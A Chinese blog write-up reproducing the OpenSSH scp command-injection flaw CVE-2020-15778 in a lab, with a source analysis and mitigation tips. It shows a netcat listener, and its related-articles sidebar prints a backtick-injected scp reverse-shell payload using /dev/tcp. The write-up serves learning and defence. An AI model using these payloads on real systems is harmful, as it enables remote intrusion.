上传github 需要验证openssh_CVE-2020-15778:OpenSSH命令注入漏洞复现

最新推荐文章于 2023-11-29 12:43:08 发布
最新推荐文章于 2023-11-29 12:43:08 发布
阅读量265 收藏
点赞数
文章标签: 上传github 需要验证openssh
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_32620265/article/details/113368666
版权

e67875bc77f0e8a12b0bbfd849e899b7.png

0x01 简介

OpenSSH是SSH(Secure SHell)协议的免费开源实现。OpenSSH是个SSH的软件,linux/unix都用openssh软件提供SSH服务。scp 是 secure copy 的缩写, scp 是 linux 系统下基于 ssh 登陆进行安全的远程文件拷贝命令。

0x02 漏洞概述

该漏洞编号CVE-2020-15778。OpenSSH的8.3p1及之前版本中的scp允许在scp.c远程功能中注入命令,攻击者可利用该漏洞执行任意命令。目前绝大多数linux系统受影响。

0x03 影响版本

OpenSSH <= OpenSSH-8.3p1

0x04 环境搭建

未安装ssh,进行安装,安装命令如下:

已安装ssh:

使用ssh -V 查看版本信息,可以看到我这里使用的实验版本是Openssh_8.3p1。

ed27228b8ce01df683ee0aa3d92d2975.png

0x05 漏洞复现

前提已知:

攻击机:192,168.152.130(kali)

目标机:192.168.152.133(centOs 7 64位)

需要知道目标ssh账号密码

1. 利用scp命令,用kali对centOs进行写文件,复制文件。

复制当前目录下的1.txt到目标的/tmp目录下,并且执行 touch /tmp/test.sh 的命令

4d42f7590fc4582e0541f30493199815.png

8a851401f5d55bd6f0ddcf732bb8fb96.png

可以发现成功的将kali上面的文件传入到centOS上面也创建了text.txt文件,确认漏洞存在:

4b9e12f9a43864f7a153c481c8755110.png

2. 执行命令:监听端口9999

命令:nc -lvvp 9999

12aee85f135ea649d6dd319343b48b4a.png

3.再打开kali的一个窗口进行反弹shell,

929199d5d03eac3e11317bac804676fb.png

e7ce50481ee98db9e38828d43ae37e9b.png

0x06 漏洞分析

在使用scp远程传输文件时,正常使用是这样的

scp SourceFile user@host:目录/TargetFile

在执行上面这条命令时会执行一个本地命令

scp -t 目录/TargetFile

对应源码如下:

52671ba7dc8b1025718cba26f28f1983.png

源码地址:

https://github.com/openssh/openssh-portable/blob/a2855c048b3f4b17d8787bd3f24232ec0cd79abe/scp.c#L989

由此可以看到对用户输入的目录没有做过滤,导致攻击者可以利用反引号(` `)可以执行一些shell命令。

反引号在linux中的作用:

反引号(`)这个字符所对应的键一般位于键盘的左上角,不要将其同单引号(')混淆。反引号括起来的字符串被shell解释为命令行,在执行时,shell首先执行该命令行,并以它的标准输出结果取代整个反引号(包括两个反引号)部分。如例程中的`date -d '-1 day' +%Y%m%d`就是把这条命令的结果赋给变量OPDATE。

0x07 修复方式

1、周期性的更换密码或密钥

2、使用rsync代替scp

参考链接:

https://github.com/cpandya2909/CVE-2020-15778/

漾漾ML
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
上传github 需要验证openssh_【OpenSSH 漏洞复现CVE202015778
weixin_29679557的博客
01-23 710
漏洞详情1、漏洞介绍2020/7/18 Chinmay Pandya披露关于CVE-2020-15778的详细信息研究人员Chinmay Pandya在openssh的scp组件中发现了一个命令注入漏洞OpenSSH的8.3p1中的scp允许在scp.c远程功能中注入命令攻击者可利用该漏洞执行任意命令,目前绝大多数linux系统受影响2、OpenSSHOpenSSH是SSH(Secu...
使用ssh连接github——git学习之路(二)
leedcanDD的博客
02-28 1410
本文介绍了ssh及其基本的用法,在学习git以及github的过程中,必然会接触很多辅助工具,我们只需在实践中学习必要的那一部分即可。了解了ssh的功能和基本原理会使用ssh-keygen生成自己的密钥对,并添加到自己的github个人账户上会使用ssh连接到远程主机能够开启ssh-agent认证代理,添加自己密钥的密码,实现客户端身份自动认证。
CVE-2020-15778 OpenSSH命令注入
明哥哥知识分享
10-19 663
漏洞介绍 SCP(secure copy)是linux系统下基于ssh登录进行安全远程文件拷贝的命令,可以在linux之间复制文件和目录。 OpenSSH中小于 8.3p1版本 SCP命令里存在命令注入漏洞。当将文件复制到远程服务器时,文件路径附加在本地scp命令的末尾,可以触发命令注入漏洞。 攻击者可以采用反引号(`)文件作为命令注入执行scp命令命令将会发送到远程服务器并执行。 影响版本 version: <=openssh-8.3p1 复现环境 攻击机:192.168.20.101 靶机:19
OpenSSH 命令注入漏洞CVE-2020-15778复现
weixin_46236101的博客
12-27 2061
0x00 漏洞介绍 CVE编号:CVE-2020-15778 发布时间:2020-07-24 危害等级:高危 漏洞版本:<= openssh-8.3p1 漏洞描述:OpenSSH 8.3p1及之前版本中的scp的scp.c文件存在操作系统命令注入漏洞。该漏洞即使在禁用ssh登录的情况下,但是允许使用scp传文件,而且远程服务器允许使用反引号(`),可利用scp复制文件到远程服务器时,执行带有payload的scp命令,从而在后续利用中getshell。 利用条件:知道目标的ssh密码 0
github上传代码_GitHub上传项目
weixin_39856208的博客
11-30 90
已经下载好git。(Git,官方下载地址)1、新建项目得到如下界面:先停在这里。2、上传项目找到要上传的项目,在对应文件夹下,单击右键,点击Git Bash Here。出现如下界面:输入相应代码:git init # 在当前项目的目录中生成本地的git管理(会发现在当前目录下多了一个.git文件夹)git add . # 将项目上所有的文件添加到仓库中的意思,...
上传代码到Github遇到的坑
qq_40604853的博客
09-25 304
1.上传方法:https://jingyan.baidu.com/article/48b558e3090a907f38c09a20.html 2.问题Please make sure you have the correct access rights and the repository exists.    链接:https://www.cnblogs.com/leealways87/ar...
Git Hub ssh免登陆
weixin_50027754的博客
12-15 119
生成秘钥 ssh-keygen 一路回车 密钥储存目录 C:\Users\用户\.ssh 公钥名称 id_rsa.pub 公钥名称 id-rsa 添加公钥
OpenSSH 命令注入漏洞(CVE-2020-15778)漏洞加固指南
乐大厨串串香飘万里
10-11 917
该工具是SSH协议的开源实现,支持对所有的传输进行加密,可有效阻止窃听、连接劫持以及其他网络级的攻击。OpenSSH 8.4p1及之前版本中的scp的scp.c文件存在命令注入漏洞。包括不限于:测试环境先做测试验证、把握时间窗口(实施时间)、备份机制、人员配合、系统保障(注明项目组侧支持),回退(配置/版本)等等。安装telnet服务,并启用telnet服务,远程使用telnet进行登陆;通过升级SSH版本解决此漏洞,使用SSH -V进行查看版本进行验证验证无问题,删除telnet服务;
配置SSH连接GitHub
asd120705fyy的博客
09-02 247
1、先安装ssh,一条命令搞定$ sudo apt-get install openssh-server2、生成秘钥$ ssh-keygen -t rsa -C "your email" 若不需要密码,连续三次回车,在~/.ssh/目录下得到两个文件:id_rsa和id_rsa.pub。3、登陆Github,将id_rsa.pub中的公钥内容全部复制到github上。点击右上角账号头像的“▼”→
【Linux】OpenSSH 命令注入漏洞(CVE-2020-15778)(iptables屏蔽22端口方式)
最新发布
实施工程师从入门到放弃
11-29 2167
操作过程中要边操作边验证,切记不要关闭已打开的窗口,保持开启,即使操作错误了,这个窗口也不会自动断开,还可以自行修复,否则就无法连接,直接找人吧。这就没辙了,只能限制服务器端口访问了,但是服务器不是我方管的,只能审慎执行命令,不然登不上去了还得找别人给帮忙处理。这个命令就是删除iptables -L列出的命令,后面数字为L列出来的顺序,建议从下往上删,绿盟扫出来的漏洞,但是禁用scp漏洞复扫还是有这个漏洞,查询版本SSH版本也是没问题的。验证1022端口是否可连接,可以的话回到上一步。
CVE-2020-15778漏洞复现
臭nana的博客
08-04 1万+
产品:Openssh 影响的组件:SCP 漏洞版本:<= openssh-8.3p1 scp命令引发的命令注入 反弹shell的payload scp 1.txt cracer@受害机ip:'`bash -i >& /dev/tcp/攻击机ip/4444 0>&1`/tmp/test.txt' 实战测试,这里使用本机进行测试 1、查看ssh版本,符合漏洞版本 ssh -V 2、先在本地新建好文件,用于上传 2、本地开启监听 3、使用s.
查看openssh版本_OpenSSH命令注入漏洞复现(CVE202015778)
weixin_39707536的博客
12-06 1615
OpenSSH命令注入漏洞复现(CVE-2020-15778)目录漏洞描述漏洞等级漏洞影响版本漏洞复现修复建议▶漏洞描述 OpenSSH是用于使用SSH协议进行远程登录的一个开源实现。通过对交互的流量进行加密防止窃听,连接劫持以及其他攻击。OpenSSH由OpenBSD项目的一些开发人员开发, 并以BSD样式的许可证提供,且已被集成到许多商业产品中。 2020年6月9日,研...
CVE-2020-2021:SAML身份验证机制绕过漏洞通告
爱国小白帽
06-30 3531
CVE-2020-2021:SAML身份验证机制绕过漏洞通告 360-CERT [三六零CERT](javascript:void(0)???? 今天 0x00 漏洞背景 2020年06月30日, 360CERT监测发现Palo Alto官方发布了SAML身份验证机制绕过的风险通告,该漏洞编号为CVE-2020-2021,漏洞等级:高危。 安全声明标记语言(SAML)是用于根据用户在另一上下文中的会话将其登录到当前应用程序中的标准。 SAML身份验证机制存在身份验证绕过的威胁。当SAML开启,同时Vali
CVE-2020-15778 漏洞复现避坑指南
weixin_45836195的博客
07-20 2621
CVE-2020-15778 漏洞复现避坑指南
OpenSSH 命令注入漏洞(CVE-2020-15778)复现
热门推荐
weixin_47531489的博客
07-20 1万+
1 简介 OpenSSH是SSH(SecureSHell)协议的免费开源实现。OpenSSH是个SSH的软件,linux/unix都用openssh软件提供SSH服务。scp 是 secure copy 的缩写, scp 是 linux 系统下基于 ssh 登陆进行安全的远程文件拷贝命令。 2 漏洞概述 该漏洞编号CVE-2020-15778OpenSSH的8.3p1及之前版本中的scp允许在scp.c远程功能中注入命令,攻击者可利用该漏洞执行任意命令。目前绝大多数linux系统受影响。 漏洞等.
OPENSSH 漏洞cve-2020-15778
m0_46580995的博客
08-03 1071
OPENSSH 漏洞cve-2020-15778 参考链接(https://github.com/cpandya2909/CVE-2020-15778) 受影响的组件:SCP 漏洞版本:<= openssh-8.3p1 漏洞前提:需要登录密码 scp ./1.txt msfadmin@192.168.3.29:/tmp/success 成功上传 作为验证也可以反弹 ...
git+openssh 的安装与简单使用
二斗墨汁
09-08 6048
# 安装git sudo apt-get install git # 安装openssh服务器 # 如不成功,可参考: http://blog.csdn.net/feliciafay/article/details/6561414 sudo apt-get install openssh-server sudo do-release-upgrade # 下面
解决GitHub中提交代码时出现SSH验证失败的一个可能解决方案
Dream_ping的博客
01-20 1533
当我们使用GitHub提交本地代码时,可能会提示: fatal: unable to access ‘https://github.com/…’: OpenSSL SSL_read: Connection was aborted, errno 10053 网上的解决方案大多数: 1.增加缓冲 git config http.postBuffer 524288000 2.更改网络认证设置 git config http.sslVerify "false" 其实这个问题在官方的文档中已经给出了解决方案,当时
【过程记录】通过ssh上传Github仓库
兴趣使然的创作者
07-20 1127
在使用微信小程序开发者工具时,想连接远程github仓库,使用用户名和密码验证一直失败。于是想直接利用gitbush工具来进行上传,为了避免每次上传时重新输入用户名和密码,采用了ssh免密上传方式。由于更换设备都需要重新配置ssh,因此将过程记录一下,以便后续查阅方便。...
环境配置--关于vscode-ssh远程连接下openssh与git自带的ssh的冲突解决方法
weixin_42100456的博客
04-10 3539
问题 报错 过程试图写入的管道不存在 原因 本机同时装有openssh和git,这样就会冲突了 解决方法 将openssh卸载了,同时指定vscode的默认ssh命令路径,将下列配置添加到vscode的用户配置的setting.json中 (可以打开命令行,where ssh,很奇怪:cmd只有显示openssh,git命令行下显示git自带的和openssh) "remote.SSH.path"...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值